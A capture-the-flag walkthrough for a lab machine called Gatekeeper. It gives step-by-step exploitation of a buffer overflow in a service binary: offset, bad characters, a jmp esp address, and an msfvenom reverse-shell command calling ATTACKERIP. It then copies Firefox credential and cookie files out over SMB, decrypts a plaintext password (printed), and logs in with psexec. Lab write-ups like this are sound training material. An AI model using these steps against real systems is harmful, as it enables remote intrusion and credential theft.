Gatekeeper

Tasks:

  1. Approach the Gates:
    1. Deploy the machine and complete the task.
  2. Defeat the Gatekeeper and pass through the fire:
    1. Start with usual nmap service scan - nmap -sC ip - 139,445(SMB),3389(RDP), 31337 (Elite ?) and many other RPC ports open.
    2. Enumerate SMB shares using smbclient -L \\ip\ , There's a share called Users accessible without password. Connect to Users share using smbclient \\ip\Users\ , cd Share, get gatekeeper.exe. Copy the binary to windows VM for simpler testing.
    3. nc ip 31337 , There is a application which takes username as input and outputs 'hello username!!!'. This is the same application we got through smb.
    4. Open gatekeeper.exe in Immunity Debugger
    5. Run ncat 127.0.0.1 31337 - you should get connected to gatekeeper locally.
    6. Generate a long string of 200 bytes using python -c "print('A'*200)" and feed that as input in ncat terminal for username , the application should crash which confirms bufferoverflow.
    7. Generate cyclic string of length 200 using online tool or using metasploit framework pattern_create.rb and send the cyclic string as username this time and note the EIP when application crashes. - 39654138
    8. Enter the EIP register value in same online tool or use !mona findmsp -distance 200 to find exact offset which breaks buffer - 146
    9. In exploit.py replace payload with bad chars and run exploit.py, notice that we have control over EIP(42424242).
    10. Look for missing bad characters if any by following ESP stack dump. If any of them is missing or not in order, try removing them from payload and repeat till all the bad characters are in same order as sent. Bad chars - \x00\x0a
    11. Run !mona jmp -r esp -cpb "\x00\x0a" to know jmp esp address - 080414C3 and convert to little endian \xc3\x14\x04\x08 then replace it in retn variable of exploit.py also assign "\x90" * 15 to padding variable(NOPs).
    12. Generate payload using msfvenom -p windows/shell_reverse_tcp LHOST=ATTACKERIP LPORT=4444 -b '\x00\x0a' -f py -v payload and replace the payload in exploit.py.
    13. Start netcat listener - nc -nlvp 4444
    14. Run exploit.py to get shell in netcat listener.
    15. type user.txt.txt to get user flag and submit. Also notice in desktop there is a file called Firefox.lnk , which suggests firefox is installed in the machine.
    16. cd C:\Users\natbat\AppData\Roaming\Mozilla\Firefox\Profiles\ljfn812a.default-release, copy logins.json C:\Users\Share , copy cert9.db C:\Users\Share, copy key4.db C:\Users\Share , copy cookies.sqlite C:\Users\Share - Now you can download these using smbclient to your local machine.
    17. Clone this repo , Copy the 4 files to a folder called loot, python firefox_decrypt.py "LootFolderLocation" - mayor:8CL7O1N78MdrCIsV creds obtained.
    18. Use psexec.py mayor:8CL7O1N78MdrCIsV@ip to login as mayor, type whoami - mayor seems to be system user.
    19. cd C:\Users\mayor\Desktop and type root.txt.txt to obtain root flag and submit !!!

results matching ""

    No results matching ""